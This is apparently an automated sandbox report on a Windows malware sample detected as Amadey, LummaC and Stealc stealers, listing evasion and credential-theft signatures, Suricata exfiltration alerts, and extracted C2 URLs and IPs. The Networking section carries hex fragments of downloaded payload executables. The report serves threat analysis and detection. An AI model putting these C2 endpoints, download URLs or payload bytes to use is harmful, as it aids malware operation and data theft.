Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565518
MD5: 27a3277f6daec8e2369a88cea407fb46
SHA1: c7da43b9bc1a51aa28cda592d8266e17057ab6b7
SHA256: ba82209b941924aeb6196fac31a5e2d13193f49be26163683bf29a293b3fcec0
Tags: exe, user-Bitsight

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected AntiVM3
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.206? Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/6802601040/SxQyhJr.exe Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000002.00000003.1701196442.00000000049F0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: a6f0d09f38.exe.7620.13.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://atten-supporse.biz:443/api", "Build Version": "LOGS11--LiveTraffi"}
Source: b5da647ae3.exe.5500.14.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 57%
Source: file.exe Virustotal: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010483001\6e1fbaaba5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010485001\98a7b9f337.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010482001\b5da647ae3.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SxQyhJr[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010484001\8b82d73f70.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_cc3844a9-b
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: Binary string: webauthn.pdb source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb@ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]q03f5 source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbL source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SxQyhJr.exe, 00000007.00000002.2452771154.0000000006350000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Windows\applaunch.pdbpdbnch.pdbdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb; source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: webauthn.pdbGCTL source: firefox.exe, 0000001C.00000003.2801056711.000001DEEBF8E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: a6f0d09f38.exe, 0000000D.00000003.2893559626.00000000084E0000.00000004.00001000.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2987390171.00000000063D2000.00000040.00000800.00020000.00000000.sdmp, 8b82d73f70.exe, 00000020.00000002.2915080351.00000000003A2000.00000040.00000001.01000000.0000001A.sdmp, 8b82d73f70.exe, 00000020.00000003.2780938560.00000000050C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: SxQyhJr.exe, 00000007.00000002.2452626823.0000000006300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: mscorlib.pdbamD source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n4C:\Windows\applaunch.pdbd source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\applaunch.pdb]qKeyT source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: o.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdbeP/ source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: applaunch.pdblaunch.pdbpdbnch.pdb.0.30319\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: symbols\exe\applaunch.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb, source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbs1 source: AppLaunch.exe, 00000008.00000002.2944711279.00000000052A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdbU source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: oC:\Windows\Microsoft.NET\Framework\v4.0.30319\applaunch.pdbxX($ source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: %%.pdb source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbV source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .PDB source: AppLaunch.exe, 00000008.00000002.2942272880.00000000050F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.PDBp source: AppLaunch.exe, 00000008.00000002.2944711279.000000000523B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E0EA8
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E169Fh 7_2_061E1618
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E169Fh 7_2_061E160A
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E0E98
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E7698
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E7689
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E7A3Dh 7_2_061E77B4
Source: C:\Users\user\AppData\Local\Temp\1010480001\SxQyhJr.exe Code function: 4x nop then jmp 061E0F07h 7_2_061E11DB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 222MB

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49753 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49759
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49780 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49798 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49816 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49818 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49839 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49879 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49919 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49803 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49797 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49815 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49877 -> 104.21.16.9:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49836 -> 104.21.16.9:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://atten-supporse.biz:443/api
Source: Malware configuration extractor IPs: 185.215.113.43
Source: unknown Network traffic detected: DNS query count 31
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:09 GMTContent-Type: application/octet-streamContent-Length: 1473536Last-Modified: Sat, 30 Nov 2024 02:41:31 GMTConnection: keep-aliveETag: "674a7b5b-167c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 79 4a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ec 15 00 00 8e 00 00 00 00 00 00 be 0b 16 00 00 20 00 00 00 20 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 16 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 0b 16 00 57 00 00 00 00 20 16 00 fe 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 eb 15 00 00 20 00 00 00 ec 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 fe 8a 00 00 00 20 16 00 00 8c 00 00 00 ee 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 16 00 00 02 00 00 00 7a 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0b 16 00 00 00 00 00 48 00 00 00 02 00 05 00 64 93 14 00 00 78 01 00 03 00 00 00 01 00 00 06 7c a8 00 00 e6 ea 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 73 04 00 00 06 25 6f 02 00 00 06 6f 03 00 00 06 2a b6 02 73 1a 00 00 0a 7d 01 00 00 04 02 7b 01 00 00 04 1b 6f 1b 00 00 0a 02 7b 01 00 00 04 28 08 00 00 06 28 1c 00 00 0a 6f 1d 00 00 0a 2a 1e 02 28 28 00 00 0a 2a 2e 73 06 00 00 06 80 02 00 00 04 2a 1e 02 28 29 00 00 0a 2a 46 03 6f 2a 00 00 0a 72 15 00 00 70 6f 2b 00 00 0a 2a ba 7e 04 00 00 04 3a 1e 00 00 00 72 ad 00 00 70 d0 06 00 00 02 28 23 00 00 0a 6f 33 00 00 0a 73 34 00 00 0a 80 04 00 00 04 7e 04 00 00 04 2a 1a 7e 05 00 00 04 2a 1e 02 80 05 00 00 04 2a 6a 28 0b 00 00 06 72 e9 00 00 70 7e 05 00 00 04 6f 35 00 00 0a 74 02 00 00 1b 2a 22 02 03 7d 27 00 00 04 2a 5e 02 0e 04 1f 18 62 03 1f 10 62 60 04 1e 62 60 05 60 7d 27 00 00 04 2a 72 02 20 00 00 00 ff 6e 03 1f 10 62 6a 60 04 1e 62 6a 60 05 6a 60 6d 7d 27 00 00 04 2a 66 03 02 28 18 00 00 06 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28 17 00 00 06 03 02 28 19 00 00 06 02 28 16 00 00 06 73 10 00 00 06 2a 66 02 28
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 03:06:17 GMTContent-Type: application/octet-streamContent-Length: 1864192Last-Modified: Sat, 30 Nov 2024 03:04:48 GMTConnection: keep-aliveETag: "674a80d0-1c7200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 42 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e6 03 00 00 c2 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 3a 9b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 60 05 00 70 00 00 00 00 50 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 05 00 00 10 00 00 00 58 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 50 05 00 00 02 00 00 00 68 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 05 00 00 02 00 00 00 6a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 70 05 00 00 02 00 00 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 6f 64 75 79 62 67 00 e0 19 00 00 d0 2f 00 00 dc 19 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 65 61 71 76 7a 76 63 69 00 10 00 00 00 b0 49 00 00 06 00 00 00 4a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 49 00 00 22 00 00 00 50 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
